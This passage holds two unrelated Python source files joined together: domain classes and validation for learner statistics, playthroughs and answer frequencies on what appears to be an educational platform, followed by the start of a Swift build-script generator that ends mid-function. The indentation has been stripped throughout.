useful_feedback_count_v1: int. Total number of answers that received
useful feedback.
useful_feedback_count_v2: int. As above, but for events with version
2.
total_hit_count_v1: int. Total number of times the state was
entered.
total_hit_count_v2: int. As above, but for events with version 2.
first_hit_count_v1: int. Number of times the state was entered for
the first time.
first_hit_count_v2: int. As above, but for events with version 2.
num_times_solution_viewed_v2: int. Number of times the solution
button was triggered to answer a state (only for version 2).
num_completions_v1: int. Number of times the state was completed.
num_completions_v2: int. As above, but for events with version 2.
"""
self.total_answers_count_v1 = total_answers_count_v1
self.total_answers_count_v2 = total_answers_count_v2
self.useful_feedback_count_v1 = useful_feedback_count_v1
self.useful_feedback_count_v2 = useful_feedback_count_v2
self.total_hit_count_v1 = total_hit_count_v1
self.total_hit_count_v2 = total_hit_count_v2
self.first_hit_count_v1 = first_hit_count_v1
self.first_hit_count_v2 = first_hit_count_v2
# Solution view analytics were only introduced in v2, and there are no
# existing event models in v1 that record solution viewed events.
self.num_times_solution_viewed_v2 = num_times_solution_viewed_v2
self.num_completions_v1 = num_completions_v1
self.num_completions_v2 = num_completions_v2
@property
def total_answers_count(self):
"""Returns the total number of answers submitted to this state.
Returns:
int. The total number of answers submitted to this state.
"""
return self.total_answers_count_v1 + self.total_answers_count_v2
@property
def useful_feedback_count(self):
"""Returns the total number of answers that received useful feedback.
Returns:
int. The total number of answers that received useful feedback.
"""
return self.useful_feedback_count_v1 + self.useful_feedback_count_v2
@property
def total_hit_count(self):
"""Returns the total number of times the state was entered.
Returns:
int. The total number of times the state was entered.
"""
return self.total_hit_count_v1 + self.total_hit_count_v2
@property
def first_hit_count(self):
"""Returns the number of times the state was entered for the first time.
Returns:
int. The number of times the state was entered for the first time.
"""
return self.first_hit_count_v1 + self.first_hit_count_v2
@property
def num_completions(self):
"""Returns total number of times the state was completed.
Returns:
int. The total number of times the state was completed.
"""
return self.num_completions_v1 + self.num_completions_v2
@property
def num_times_solution_viewed(self):
"""Returns the number of times the solution button was triggered.
Returns:
int. Number of times the solution button was triggered to answer a
state only for events for schema version 2.
"""
return self.num_times_solution_viewed_v2
@classmethod
def create_default(cls):
"""Creates a StateStats domain object and sets all properties to 0."""
return cls(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def to_dict(self):
"""Returns a dict representation of the domain object."""
state_stats_dict = {
'total_answers_count_v1': self.total_answers_count_v1,
'total_answers_count_v2': self.total_answers_count_v2,
'useful_feedback_count_v1': self.useful_feedback_count_v1,
'useful_feedback_count_v2': self.useful_feedback_count_v2,
'total_hit_count_v1': self.total_hit_count_v1,
'total_hit_count_v2': self.total_hit_count_v2,
'first_hit_count_v1': self.first_hit_count_v1,
'first_hit_count_v2': self.first_hit_count_v2,
'num_times_solution_viewed_v2': (
self.num_times_solution_viewed_v2),
'num_completions_v1': self.num_completions_v1,
'num_completions_v2': self.num_completions_v2
}
return state_stats_dict
def to_frontend_dict(self):
"""Returns a dict representation of the domain object for use in the
frontend.
"""
state_stats_dict = {
'total_answers_count': self.total_answers_count,
'useful_feedback_count': self.useful_feedback_count,
'total_hit_count': self.total_hit_count,
'first_hit_count': self.first_hit_count,
'num_times_solution_viewed': self.num_times_solution_viewed,
'num_completions': self.num_completions
}
return state_stats_dict
@classmethod
def from_dict(cls, state_stats_dict):
"""Constructs a StateStats domain object from a dict."""
return cls(
state_stats_dict['total_answers_count_v1'],
state_stats_dict['total_answers_count_v2'],
state_stats_dict['useful_feedback_count_v1'],
state_stats_dict['useful_feedback_count_v2'],
state_stats_dict['total_hit_count_v1'],
state_stats_dict['total_hit_count_v2'],
state_stats_dict['first_hit_count_v1'],
state_stats_dict['first_hit_count_v2'],
state_stats_dict['num_times_solution_viewed_v2'],
state_stats_dict['num_completions_v1'],
state_stats_dict['num_completions_v2']
)
def validate(self):
"""Validates the StateStats domain object."""
state_stats_properties = [
'total_answers_count_v1',
'total_answers_count_v2',
'useful_feedback_count_v1',
'useful_feedback_count_v2',
'total_hit_count_v1',
'total_hit_count_v2',
'first_hit_count_v1',
'first_hit_count_v2',
'num_times_solution_viewed_v2',
'num_completions_v1',
'num_completions_v2'
]
state_stats_dict = self.to_dict()
for stat_property in state_stats_properties:
if not isinstance(state_stats_dict[stat_property], int):
raise utils.ValidationError(
'Expected %s to be an int, received %s' % (
stat_property, state_stats_dict[stat_property]))
if state_stats_dict[stat_property] < 0:
raise utils.ValidationError(
'%s cannot have negative values' % (stat_property))
class ExplorationIssues(object):
"""Domain object representing the exploration to issues mapping for an
exploration.
"""
def __init__(self, exp_id, exp_version, unresolved_issues):
"""Constructs an ExplorationIssues domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
unresolved_issues: list(ExplorationIssue). List of exploration
issues.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.unresolved_issues = unresolved_issues
@classmethod
def create_default(cls, exp_id, exp_version):
"""Creates a default ExplorationIssues domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
Returns:
ExplorationIssues. The exploration issues domain object.
"""
return cls(exp_id, exp_version, [])
def to_dict(self):
"""Returns a dict representation of the ExplorationIssues domain object.
Returns:
dict. A dict mapping of all fields of ExplorationIssues object.
"""
unresolved_issue_dicts = [
unresolved_issue.to_dict()
for unresolved_issue in self.unresolved_issues]
return {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'unresolved_issues': unresolved_issue_dicts
}
@classmethod
def from_dict(cls, exp_issues_dict):
"""Returns an ExplorationIssues object from a dict.
Args:
exp_issues_dict: dict. A dict mapping of all fields of
ExplorationIssues object.
Returns:
ExplorationIssues. The corresponding ExplorationIssues domain
object.
"""
unresolved_issues = [
ExplorationIssue.from_dict(unresolved_issue_dict)
for unresolved_issue_dict in exp_issues_dict['unresolved_issues']]
return cls(
exp_issues_dict['exp_id'], exp_issues_dict['exp_version'],
unresolved_issues)
def validate(self):
"""Validates the ExplorationIssues domain object."""
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % type(
self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % type(
self.exp_version))
if not isinstance(self.unresolved_issues, list):
raise utils.ValidationError(
'Expected unresolved_issues to be a list, received %s' % (
type(self.unresolved_issues)))
for issue in self.unresolved_issues:
issue.validate()
class Playthrough(object):
"""Domain object representing a learner playthrough.
"""
def __init__(
self, exp_id, exp_version, issue_type, issue_customization_args,
actions):
"""Constructs a Playthrough domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
issue_type: str. Type of the issue.
issue_customization_args: dict. The customization args dict for the
given issue_type.
actions: list(LearnerAction). List of playthrough learner actions.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.issue_type = issue_type
self.issue_customization_args = issue_customization_args
self.actions = actions
def to_dict(self):
"""Returns a dict representation of the Playthrough domain object.
Returns:
dict. A dict mapping of all fields of Playthrough object.
"""
action_dicts = [action.to_dict() for action in self.actions]
return {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'issue_type': self.issue_type,
'issue_customization_args': self.issue_customization_args,
'actions': action_dicts,
}
@classmethod
def from_dict(cls, playthrough_dict):
"""Returns a Playthrough object from a dict.
Args:
playthrough_dict: dict. A dict mapping of all fields of Playthrough
object.
Returns:
Playthrough. The corresponding Playthrough domain object.
"""
actions = [
LearnerAction.from_dict(action_dict)
for action_dict in playthrough_dict['actions']]
return cls(
playthrough_dict['exp_id'],
playthrough_dict['exp_version'],
playthrough_dict['issue_type'],
playthrough_dict['issue_customization_args'],
actions)
@classmethod
def from_backend_dict(cls, playthrough_data):
"""Checks whether the playthrough dict has the correct keys and then
returns a domain object instance.
Args:
playthrough_data: dict. Dict representing a playthrough.
Returns:
Playthrough. A playthrough domain object.
"""
playthrough_properties = [
'exp_id', 'exp_version', 'issue_type',
'issue_customization_args', 'actions']
for playthrough_property in playthrough_properties:
if playthrough_property not in playthrough_data:
raise utils.ValidationError(
'%s not in playthrough data dict.' % (
playthrough_property))
actions = [
LearnerAction.from_dict(action_dict)
for action_dict in playthrough_data['actions']]
playthrough = cls(
playthrough_data['exp_id'],
playthrough_data['exp_version'],
playthrough_data['issue_type'],
playthrough_data['issue_customization_args'],
actions)
playthrough.validate()
return playthrough
def validate(self):
"""Validates the Playthrough domain object."""
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % type(
self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % (
type(self.exp_version)))
if not isinstance(self.issue_type, basestring):
raise utils.ValidationError(
'Expected issue_type to be a string, received %s' % type(
self.issue_type))
if not isinstance(self.issue_customization_args, dict):
raise utils.ValidationError(
'Expected issue_customization_args to be a dict, '
'received %s' % (
type(self.issue_customization_args)))
try:
issue = issue_registry.Registry.get_issue_by_type(
self.issue_type)
except KeyError:
raise utils.ValidationError('Invalid issue type: %s' % (
self.issue_type))
exp_domain.validate_customization_args_and_values(
'issue', self.issue_type, self.issue_customization_args,
issue.customization_arg_specs)
if not isinstance(self.actions, list):
raise utils.ValidationError(
'Expected actions to be a list, received %s' % (
type(self.actions)))
for action in self.actions:
action.validate()
class ExplorationIssue(object):
"""Domain object representing an exploration issue."""
def __init__(
self, issue_type, issue_customization_args, playthrough_ids,
schema_version, is_valid):
"""Constructs an ExplorationIssue domain object.
Args:
issue_type: str. Type of the issue.
issue_customization_args: dict. The customization dict. The keys are
names of customization_args and the values are dicts with a
single key, 'value', whose corresponding value is the value of
the customization arg.
playthrough_ids: list(str). List of playthrough IDs.
schema_version: int. Schema version for the exploration issue.
is_valid: bool. Whether the issue and the associated playthroughs
are valid.
"""
self.issue_type = issue_type
self.issue_customization_args = issue_customization_args
self.playthrough_ids = playthrough_ids
self.schema_version = schema_version
self.is_valid = is_valid
def to_dict(self):
"""Returns a dict representation of the ExplorationIssue domain object.
Returns:
dict. A dict mapping of all fields of ExplorationIssue object.
"""
return {
'issue_type': self.issue_type,
'issue_customization_args': exp_domain.get_full_customization_args(
self.issue_customization_args,
issue_registry.Registry.get_issue_by_type(
self.issue_type).customization_arg_specs),
'playthrough_ids': self.playthrough_ids,
'schema_version': self.schema_version,
'is_valid': self.is_valid
}
@classmethod
def from_dict(cls, issue_dict):
"""Returns an ExplorationIssue object from a dict.
Args:
issue_dict: dict. A dict mapping of all fields of ExplorationIssue
object.
Returns:
ExplorationIssue. The corresponding ExplorationIssue domain object.
"""
return cls(
issue_dict['issue_type'],
issue_dict['issue_customization_args'],
issue_dict['playthrough_ids'],
issue_dict['schema_version'],
issue_dict['is_valid'])
@classmethod
def from_backend_dict(cls, exp_issue_dict):
"""Checks whether the exploration issue dict has the correct keys and
then returns a domain object instance.
Args:
exp_issue_dict: dict. Dict representing an exploration issue.
Returns:
ExplorationIssue. The exploration issue domain object.
"""
exp_issue_properties = [
'issue_type', 'schema_version', 'issue_customization_args',
'playthrough_ids', 'is_valid']
for exp_issue_property in exp_issue_properties:
if exp_issue_property not in exp_issue_dict:
raise utils.ValidationError(
'%s not in exploration issue dict.' % (exp_issue_property))
dummy_exp_issue = cls(
exp_issue_dict['issue_type'],
exp_issue_dict['issue_customization_args'], [],
exp_issue_dict['schema_version'], exp_issue_dict['is_valid'])
dummy_exp_issue.validate()
return dummy_exp_issue
@classmethod
def update_exp_issue_from_model(cls, issue_dict):
"""Converts the exploration issue blob given from
current issue_schema_version to current issue_schema_version + 1.
Note that the issue_dict being passed in is modified in-place.
Args:
issue_dict: dict. Dict representing the ExplorationIssue object.
"""
current_issue_schema_version = issue_dict['schema_version']
issue_dict['schema_version'] += 1
conversion_fn = getattr(cls, '_convert_issue_v%s_dict_to_v%s_dict' % (
current_issue_schema_version, current_issue_schema_version + 1))
issue_dict = conversion_fn(issue_dict)
@classmethod
def _convert_issue_v1_dict_to_v2_dict(cls, issue_dict):
"""Converts a v1 issue dict to a v2 issue dict. This function is now
implemented only for testing purposes and must be rewritten when an
actual schema migration from v1 to v2 takes place.
"""
raise NotImplementedError
def validate(self):
"""Validates the ExplorationIssue domain object."""
if not isinstance(self.issue_type, basestring):
raise utils.ValidationError(
'Expected issue_type to be a string, received %s' % (
type(self.issue_type)))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an int, received %s' % (
type(self.schema_version)))
try:
issue = issue_registry.Registry.get_issue_by_type(
self.issue_type)
except KeyError:
raise utils.ValidationError('Invalid issue type: %s' % (
self.issue_type))
exp_domain.validate_customization_args_and_values(
'issue', self.issue_type, self.issue_customization_args,
issue.customization_arg_specs)
if not isinstance(self.playthrough_ids, list):
raise utils.ValidationError(
'Expected playthrough_ids to be a list, received %s' % (
type(self.playthrough_ids)))
for playthrough_id in self.playthrough_ids:
if not isinstance(playthrough_id, basestring):
raise utils.ValidationError(
'Expected each playthrough_id to be a string, received '
'%s' % type(playthrough_id))
class LearnerAction(object):
"""Domain object representing a learner action."""
def __init__(self, action_type, action_customization_args, schema_version):
"""Constructs a LearnerAction domain object.
Args:
action_type: str. Type of the action.
action_customization_args: dict. The customization dict. The keys
are names of customization_args and the values are dicts with a
single key, 'value', whose corresponding value is the value of
the customization arg.
schema_version: int. Schema version for the learner action.
"""
self.action_type = action_type
self.action_customization_args = action_customization_args
self.schema_version = schema_version
def to_dict(self):
"""Returns a dict representation of the LearnerAction domain object.
Returns:
dict. A dict mapping of all fields of LearnerAction object.
"""
return {
'action_type': self.action_type,
'action_customization_args': exp_domain.get_full_customization_args(
self.action_customization_args,
action_registry.Registry.get_action_by_type(
self.action_type).customization_arg_specs),
'schema_version': self.schema_version
}
@classmethod
def from_dict(cls, action_dict):
"""Returns a LearnerAction object from a dict.
Args:
action_dict: dict. A dict mapping of all fields of LearnerAction
object.
Returns:
LearnerAction. The corresponding LearnerAction domain object.
"""
return cls(
action_dict['action_type'],
action_dict['action_customization_args'],
action_dict['schema_version'])
@classmethod
def update_learner_action_from_model(cls, action_dict):
"""Converts the learner action blob given from
current action_schema_version to current action_schema_version + 1.
Note that the action_dict being passed in is modified in-place.
Args:
action_dict: dict. Dict representing the LearnerAction object.
"""
current_action_schema_version = action_dict['schema_version']
action_dict['schema_version'] += 1
conversion_fn = getattr(cls, '_convert_action_v%s_dict_to_v%s_dict' % (
current_action_schema_version, current_action_schema_version + 1))
action_dict = conversion_fn(action_dict)
@classmethod
def _convert_action_v1_dict_to_v2_dict(cls, action_dict):
"""Converts a v1 action dict to a v2 action dict. This function is now
implemented only for testing purposes and must be rewritten when an
actual schema migration from v1 to v2 takes place.
"""
raise NotImplementedError
def validate(self):
"""Validates the LearnerAction domain object."""
if not isinstance(self.action_type, basestring):
raise utils.ValidationError(
'Expected action_type to be a string, received %s' % (
type(self.action_type)))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an int, received %s' % (
type(self.schema_version)))
try:
action = action_registry.Registry.get_action_by_type(
self.action_type)
except KeyError:
raise utils.ValidationError(
'Invalid action type: %s' % self.action_type)
exp_domain.validate_customization_args_and_values(
'action', self.action_type, self.action_customization_args,
action.customization_arg_specs)
# TODO(bhenning): Monitor sizes (lengths of submitted_answer_list) of these
# objects and determine if we should enforce an upper bound for
# submitted_answer_list.
class StateAnswers(object):
"""Domain object containing answers submitted to an exploration state."""
def __init__(
self, exploration_id, exploration_version, state_name,
interaction_id, submitted_answer_list,
schema_version=feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION):
"""Constructs a StateAnswers domain object.
Args:
exploration_id. The ID of the exploration corresponding to submitted
answers.
exploration_version. The version of the exploration corresponding to
submitted answers.
state_name. The state to which the answers were submitted.
interaction_id. The ID of the interaction which created the answers.
submitted_answer_list. The list of SubmittedAnswer domain objects
that were submitted to the exploration and version specified in
this object.
schema_version. The schema version of this answers object.
"""
self.exploration_id = exploration_id
self.exploration_version = exploration_version
self.state_name = state_name
self.interaction_id = interaction_id
self.submitted_answer_list = submitted_answer_list
self.schema_version = schema_version
def get_submitted_answer_dict_list(self):
"""Returns the submitted_answer_list stored within this object as a list
of StateAnswer dicts.
"""
return [state_answer.to_dict()
for state_answer in self.submitted_answer_list]
def validate(self):
"""Validates StateAnswers domain object entity."""
if not isinstance(self.exploration_id, basestring):
raise utils.ValidationError(
'Expected exploration_id to be a string, received %s' % str(
self.exploration_id))
if not isinstance(self.state_name, basestring):
raise utils.ValidationError(
'Expected state_name to be a string, received %s' % str(
self.state_name))
if self.interaction_id is not None:
if not isinstance(self.interaction_id, basestring):
raise utils.ValidationError(
'Expected interaction_id to be a string, received %s' % str(
self.interaction_id))
# Verify interaction_id is valid.
if (self.interaction_id not in
interaction_registry.Registry.get_all_interaction_ids()):
raise utils.ValidationError(
'Unknown interaction_id: %s' % self.interaction_id)
if not isinstance(self.submitted_answer_list, list):
raise utils.ValidationError(
'Expected submitted_answer_list to be a list, received %s' %
str(self.submitted_answer_list))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an integer, received %s' % str(
self.schema_version))
if self.schema_version < 1:
raise utils.ValidationError(
'schema_version < 1: %d' % self.schema_version)
if self.schema_version > feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION:
raise utils.ValidationError(
'schema_version > feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION '
'(%d): %d' % (
feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION,
self.schema_version))
class SubmittedAnswer(object):
"""Domain object representing an answer submitted to a state."""
# NOTE TO DEVELOPERS: do not use the rule_spec_str and answer_str
# parameters; they are only populated by the answer migration job. They only
# represent context that is lost as part of the answer migration and are
# used as part of validating the migration was correct. They may be
# referenced in future migration or mapreduce jobs, or they may be removed
# without warning or migration.
def __init__(
self, answer, interaction_id, answer_group_index,
rule_spec_index, classification_categorization, params,
session_id, time_spent_in_sec, rule_spec_str=None,
answer_str=None):
self.answer = answer
self.interaction_id = interaction_id
self.answer_group_index = answer_group_index
self.rule_spec_index = rule_spec_index
self.classification_categorization = classification_categorization
self.params = params
self.session_id = session_id
self.time_spent_in_sec = time_spent_in_sec
self.rule_spec_str = rule_spec_str
self.answer_str = answer_str
def to_dict(self):
"""Returns the dict of submitted answer.
Returns:
dict. The submitted answer dict.
"""
submitted_answer_dict = {
'answer': self.answer,
'interaction_id': self.interaction_id,
'answer_group_index': self.answer_group_index,
'rule_spec_index': self.rule_spec_index,
'classification_categorization': self.classification_categorization,
'params': self.params,
'session_id': self.session_id,
'time_spent_in_sec': self.time_spent_in_sec,
}
if self.rule_spec_str is not None:
submitted_answer_dict['rule_spec_str'] = self.rule_spec_str
if self.answer_str is not None:
submitted_answer_dict['answer_str'] = self.answer_str
return submitted_answer_dict
@classmethod
def from_dict(cls, submitted_answer_dict):
"""Returns the domain object representing an answer submitted to a
state.
Returns:
SubmittedAnswer. The SubmittedAnswer domin object.
"""
return cls(
submitted_answer_dict['answer'],
submitted_answer_dict['interaction_id'],
submitted_answer_dict['answer_group_index'],
submitted_answer_dict['rule_spec_index'],
submitted_answer_dict['classification_categorization'],
submitted_answer_dict['params'],
submitted_answer_dict['session_id'],
submitted_answer_dict['time_spent_in_sec'],
rule_spec_str=submitted_answer_dict.get('rule_spec_str'),
answer_str=submitted_answer_dict.get('answer_str'))
def validate(self):
"""Validates this submitted answer object."""
# TODO(bhenning): Validate the normalized answer against future answer
# objects after #956 is addressed.
if self.time_spent_in_sec is None:
raise utils.ValidationError(
'SubmittedAnswers must have a provided time_spent_in_sec')
if self.session_id is None:
raise utils.ValidationError(
'SubmittedAnswers must have a provided session_id')
if self.rule_spec_str is not None and not isinstance(
self.rule_spec_str, basestring):
raise utils.ValidationError(
'Expected rule_spec_str to be either None or a string, '
'received %s' % str(self.rule_spec_str))
if self.answer_str is not None and not isinstance(
self.answer_str, basestring):
raise utils.ValidationError(
'Expected answer_str to be either None or a string, received '
'%s' % str(self.answer_str))
if not isinstance(self.session_id, basestring):
raise utils.ValidationError(
'Expected session_id to be a string, received %s' %
str(self.session_id))
if not isinstance(self.time_spent_in_sec, numbers.Number):
raise utils.ValidationError(
'Expected time_spent_in_sec to be a number, received %s' %
str(self.time_spent_in_sec))
if not isinstance(self.params, dict):
raise utils.ValidationError(
'Expected params to be a dict, received %s' % str(self.params))
if not isinstance(self.answer_group_index, int):
raise utils.ValidationError(
'Expected answer_group_index to be an integer, received %s' %
str(self.answer_group_index))
if self.rule_spec_index is not None and not (
isinstance(self.rule_spec_index, int)):
raise utils.ValidationError(
'Expected rule_spec_index to be an integer, received %s' %
str(self.rule_spec_index))
if self.answer_group_index < 0:
raise utils.ValidationError(
'Expected answer_group_index to be non-negative, received %d' %
self.answer_group_index)
if self.rule_spec_index is not None and self.rule_spec_index < 0:
raise utils.ValidationError(
'Expected rule_spec_index to be non-negative, received %d' %
self.rule_spec_index)
if self.time_spent_in_sec < 0.:
raise utils.ValidationError(
'Expected time_spent_in_sec to be non-negative, received %f' %
self.time_spent_in_sec)
if self.answer is None and (
self.interaction_id not in feconf.LINEAR_INTERACTION_IDS):
raise utils.ValidationError(
'SubmittedAnswers must have a provided answer except for '
'linear interactions')
valid_classification_categories = [
exp_domain.EXPLICIT_CLASSIFICATION,
exp_domain.TRAINING_DATA_CLASSIFICATION,
exp_domain.STATISTICAL_CLASSIFICATION,
exp_domain.DEFAULT_OUTCOME_CLASSIFICATION]
if self.classification_categorization not in (
valid_classification_categories):
raise utils.ValidationError(
'Expected valid classification_categorization, received %s' %
self.classification_categorization)
class AnswerOccurrence(object):
"""Domain object that represents a specific answer that occurred some number
of times.
"""
def __init__(self, answer, frequency):
"""Initialize domain object for answer occurrences."""
self.answer = answer
self.frequency = frequency
def to_raw_type(self):
"""Returns a Python dict representing the specific answer.
Returns:
dict. The specific answer dict in the following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return {
'answer': self.answer,
'frequency': self.frequency
}
@classmethod
def from_raw_type(cls, answer_occurrence_dict):
"""Returns domain object that represents a specific answer that occurred
some number of times.
Args:
answer_occurrence_dict: dict. The specific answer dict in the
following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
AnswerOccurrence. The AnswerOccurrence domain object.
"""
return cls(
answer_occurrence_dict['answer'],
answer_occurrence_dict['frequency'])
class AnswerCalculationOutput(object):
"""Domain object superclass that represents the output of an answer
calculation.
"""
def __init__(self, calculation_output_type):
self.calculation_output_type = calculation_output_type
class AnswerFrequencyList(AnswerCalculationOutput):
"""Domain object that represents an output list of AnswerOccurrences."""
def __init__(self, answer_occurrences=None):
"""Initialize domain object for answer frequency list for a given list
of AnswerOccurrence objects (default is empty list).
"""
super(AnswerFrequencyList, self).__init__(
CALC_OUTPUT_TYPE_ANSWER_FREQUENCY_LIST)
self.answer_occurrences = (
answer_occurrences if answer_occurrences else [])
def to_raw_type(self):
"""Returns the answer occurrences list with each answer represented as
a Python dict.
Returns:
list(dict). A list of answer occurrence dicts. Each dict has the
following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return [
answer_occurrence.to_raw_type()
for answer_occurrence in self.answer_occurrences]
@classmethod
def from_raw_type(cls, answer_occurrence_list):
"""Creates a domain object that represents an output list of
AnswerOccurrences.
Args:
answer_occurrence_list: list(dict). A list containing answer
occurrence dicts in the following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
AnswerFrequencyList. The domain object for answer occurrences list.
"""
return cls([
AnswerOccurrence.from_raw_type(answer_occurrence_dict)
for answer_occurrence_dict in answer_occurrence_list])
class CategorizedAnswerFrequencyLists(AnswerCalculationOutput):
"""AnswerFrequencyLists that are categorized based on arbitrary
categories.
"""
def __init__(self, categorized_answer_freq_lists=None):
"""Initialize domain object for categorized answer frequency lists for
a given dict (default is empty).
"""
super(CategorizedAnswerFrequencyLists, self).__init__(
CALC_OUTPUT_TYPE_CATEGORIZED_ANSWER_FREQUENCY_LISTS)
self.categorized_answer_freq_lists = (
categorized_answer_freq_lists
if categorized_answer_freq_lists else {})
def to_raw_type(self):
"""Returns the categorized frequency Python dict.
Returns:
dict. A dict whose keys are category names and whose corresponding
values are lists of answer frequency dicts. Each answer
frequency dict has the following keys and values:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return {
category: answer_frequency_list.to_raw_type()
for category, answer_frequency_list in (
self.categorized_answer_freq_lists.iteritems())
}
@classmethod
def from_raw_type(cls, categorized_frequency_dict):
"""Returns the domain object for categorized answer frequency dict for
a given dict.
Args:
categorized_frequency_dict: dict. The categorized answer frequency
dict whose keys are category names and whose corresponding
values are lists of answer frequency dicts. Each answer
frequency dict has the following keys and values:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
CategorizedAnswerFrequencyLists. The domain object for categorized
answer frequency dict.
"""
return cls({
category: AnswerFrequencyList.from_raw_type(answer_occurrence_list)
for category, answer_occurrence_list in (
categorized_frequency_dict.iteritems())
})
class StateAnswersCalcOutput(object):
"""Domain object that represents output of calculations operating on
state answers.
"""
def __init__(
self, exploration_id, exploration_version, state_name,
interaction_id, calculation_id, calculation_output):
"""Initialize domain object for state answers calculation output.
Args:
exploration_id: str. The ID of the exploration corresponding to the
answer calculation output.
exploration_version: str. The version of the exploration
corresponding to the answer calculation output.
state_name: str. The name of the exploration state to which the
aggregated answers were submitted.
interaction_id: str. The ID of the interaction.
calculation_id: str. Which calculation was performed on the given
answer data.
calculation_output: AnswerCalculationOutput. The output of an
answer aggregation operation.
"""
self.exploration_id = exploration_id
self.exploration_version = exploration_version
self.state_name = state_name
self.calculation_id = calculation_id
self.interaction_id = interaction_id
self.calculation_output = calculation_output
def save(self):
"""Validate the domain object and commit it to storage."""
self.validate()
stats_models.StateAnswersCalcOutputModel.create_or_update(
self.exploration_id, self.exploration_version, self.state_name,
self.interaction_id, self.calculation_id,
self.calculation_output.calculation_output_type,
self.calculation_output.to_raw_type())
def validate(self):
"""Validates StateAnswersCalcOutputModel domain object entity before
it is commited to storage.
"""
# There is a danger of data overflow if answer_opts exceeds 1MB. This
# will be addressed later if it happens regularly. At the moment, a
# ValidationError is raised if an answer exceeds the maximum size.
max_bytes_per_calc_output_data = 999999
if not isinstance(self.exploration_id, basestring):
raise utils.ValidationError(
'Expected exploration_id to be a string, received %s' % str(
self.exploration_id))
if not isinstance(self.state_name, basestring):
raise utils.ValidationError(
'Expected state_name to be a string, received %s' % str(
self.state_name))
if not isinstance(self.calculation_id, basestring):
raise utils.ValidationError(
'Expected calculation_id to be a string, received %s' % str(
self.calculation_id))
if (not isinstance(self.calculation_output, AnswerFrequencyList)
and not isinstance(
self.calculation_output, CategorizedAnswerFrequencyLists)):
raise utils.ValidationError(
'Expected calculation output to be one of AnswerFrequencyList '
'or CategorizedAnswerFrequencyLists, encountered: %s' % (
self.calculation_output))
output_data = self.calculation_output.to_raw_type()
if sys.getsizeof(output_data) > max_bytes_per_calc_output_data:
# TODO(msl): find a better way to deal with big
# calculation output data, e.g. just skip. At the moment,
# too long answers produce a ValidationError.
raise utils.ValidationError(
'calculation_output is too big to be stored (size: %d): %s' % (
sys.getsizeof(output_data), str(output_data)))
|
|
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2015 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
from .config import Configuration
import os
class Script:
products = []
workspaces = []
extra = ""
def __init__(self):
pass
def add_product(self, product):
self.workspaces = None
self.products.append(product)
def add_workspace(self, workspace):
self.products = None
self.workspaces.append(workspace)
def add_text(self, text):
self.extra += text + "\n\n"
def generate_products(self):
variables = ""
for key, val in Configuration.current.variables.items():
variables += key + "=" + val
variables += "\n"
verbose_flags = """
VERBOSE_FLAGS = """
if Configuration.current.verbose:
verbose_flags += "-v"
verbose_flags += "\n"
swift_triple = Configuration.current.target.swift_triple
base_flags = """
TARGET = """ + Configuration.current.target.triple + """
DSTROOT = """ + Configuration.current.install_directory.absolute() + """
"""
if swift_triple is not None:
base_flags += """
SWIFT_TARGET = """ + Configuration.current.target.swift_triple + """
SWIFT_ARCH = """ + Configuration.current.target.swift_arch + """
"""
base_flags += """
MODULE_CACHE_PATH = """ + Configuration.current.module_cache_directory.relative() + """
BUILD_DIR = """ + Configuration.current.build_directory.relative() + """
INTERMEDIATE_DIR = """ + Configuration.current.intermediate_directory.relative() + """
CLANG = """ + Configuration.current.clang + """
CLANGXX = """ + Configuration.current.clangxx + """
SWIFT = """ + Configuration.current.swift + """
SWIFTC = """ + Configuration.current.swiftc + """
SDKROOT = """ + Configuration.current.swift_sdk + """
AR = """ + Configuration.current.ar + """
OS = """ + Configuration.current.target.swift_sdk_name + """
ARCH = """ + Configuration.current.target.swift_arch + """
DYLIB_PREFIX = """ + Configuration.current.target.dynamic_library_prefix + """
DYLIB_SUFFIX = """ + Configuration.current.target.dynamic_library_suffix + """
PREFIX = """ + Configuration.current.prefix + """
"""
if Configuration.current.requires_pkg_config:
base_flags += """
PKG_CONFIG = """ + Configuration.current.pkg_config + """
"""
if Configuration.current.system_root is not None:
base_flags += """
SYSROOT = """ + Configuration.current.system_root.absolute() + """
"""
base_flags += """
SRCROOT = """ + Configuration.current.source_root.relative() + """
BINUTILS_VERSION = 4.8
TARGET_LDSYSROOT =
"""
if Configuration.current.bootstrap_directory is not None:
base_flags += """
BOOTSTRAP_DIR = """ + Configuration.current.bootstrap_directory.relative() + """/common
TARGET_BOOTSTRAP_DIR = """ + Configuration.current.bootstrap_directory.relative() + """/${TARGET}
"""
